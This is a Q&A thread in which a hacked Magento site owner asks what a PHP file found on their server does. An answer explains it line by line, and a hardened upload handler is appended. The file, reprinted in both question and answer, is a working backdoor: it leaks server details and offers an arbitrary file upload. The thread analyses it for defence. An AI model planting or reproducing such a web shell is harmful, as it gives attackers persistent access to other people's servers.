user829174

Reputation: 6362

My Magento web site was hacked, what does this php code do?

I just found a PHP file on my hosting. With 0.01% knowledge of PHP, can someone please explain to me what this code does?

<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

Upvotes: 3

Views: 1958

Answers (1)

Patrick Murphy

Reputation: 2329

Code Breakdown:

If the variable in the query string has a value (i.e. index.php?ourzr=set)

<?php 
   if(isset($_GET["ourzr"])){

Then display information about your server's operating system using the function php_uname(). They use this information to target the next round of hacks to your system specifics.

echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";

Create an HTML form that allows more hack files to be uploaded.

         echo"<form method=post enctype=multipart/form-data>";
         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";

If a file has been uploaded, copy the file from the temp folder to a normal folder, not under the temp name but under the original name.

     if($_POST["v"]==up){
             if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                    echo"<b>success</b>-->".$_FILES["f"]["name"];
                }else{
                    echo"<b>failed</b>";
                }
          }
      }
?>

This part is just a little message saying "I'm a kool script kiddie from the gangsters crew"

<title>Hacked by d3b~X</title>
                            <center>
                                <div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
    <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

Conclusion:

DELETE THIS FILE ASAP

This script was somehow uploaded to your server through some vulnerability that likely still exists (Unless the hacker was nice enough to fix it for you).

They found a way to get this one file on your server somewhere they can access it, now they want to use it to continue to upload scripts and other malicious data. Delete this file, and look into securing anywhere your site uploads files of any kind.

Next Steps:

Read about how hackers use file uploads to upload scripts like these, and other things they can do with their own upload form: https://www.acunetix.com/websitesecurity/upload-forms-threat/

Read up on how to create a secure upload script: There are many other tutorials

Read more about security, and try to learn a little PHP. Let me know if you have any more specific questions.

Hunt down this guy I guess: https://twitter.com/d3b_x

Upvotes: 12
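
What a hardened upload handler looks like next to the dropper analysed above (an added example, not code from the question or the answer; the storage directory, size limit, type allowlist and the field name `f` are assumptions for illustration):

```php
<?php
// Added example: hardened upload handler, contrasted with the dropper's
// copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]). All constants are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/private_uploads';   // assumed path outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;               // assumed 2 MiB limit
const ALLOWED_TYPES = [                           // detected MIME type => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_upload(array $file): string
{
    // Check the upload status explicitly; the dropper hid errors with @ instead.
    if (!isset($file['error']) || is_array($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if ($file['size'] <= 0 || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('File size not allowed');
    }
    // Only accept a temp file that PHP itself created for this request.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    // Decide the type from the file contents, never from the client-supplied name or type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('File type not allowed');
    }
    // Server-generated name plus allowlisted extension: $file['name'] is never used,
    // so the client cannot pick a .php name or a path as the destination.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);   // readable by the application, never executable
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['f'])) {
    // Authentication and CSRF checks belong here; they are application-specific.
    try {
        echo 'Stored as ' . store_upload($_FILES['f']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage());
    }
}
```

A content-based type check alone can be passed by a file that is both a valid image and contains PHP, which is why the handler also forces the extension and stores files where the web server will not execute them.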
